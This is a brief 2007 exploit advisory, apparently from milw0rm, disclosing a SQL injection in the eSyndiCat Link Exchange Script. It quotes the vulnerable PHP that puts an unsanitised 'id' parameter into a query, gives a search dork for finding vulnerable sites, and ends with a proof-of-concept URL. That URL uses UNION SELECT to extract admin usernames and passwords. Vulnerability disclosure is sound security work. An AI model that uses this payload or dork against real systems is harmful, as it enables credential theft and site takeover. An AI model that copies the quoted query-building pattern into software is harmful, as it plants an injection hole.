-------------------------------------------------------------- eSyndiCat Link Exchange Script - Remote SQL Injection Advisory -------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.esyndicat.com/ dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script" details..: works with magic_quotes_gpc = off [-] Vulnerable code in /suggest-link.php : 30. /** gets information about current category **/ 31. $category =& $gDirDb->getCategoryById($_GET['id']); 32. $gDirSmarty->assign_by_ref('category', $category); [-] getCategoryById function defined in /classes/Dir.php : 323. function getCategoryById($aCategory) 325. { 326. $sql = "SELECT * FROM `{$this->mPrefix}categories` "; 327. $sql .= "WHERE `id` = '{$aCategory}'"; 328. 329. return $this->mDb->getRow($sql); 330. } [*] An attacker can break database through browser! P.o.C. : http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/* # milw0rm.com [2007-12-25]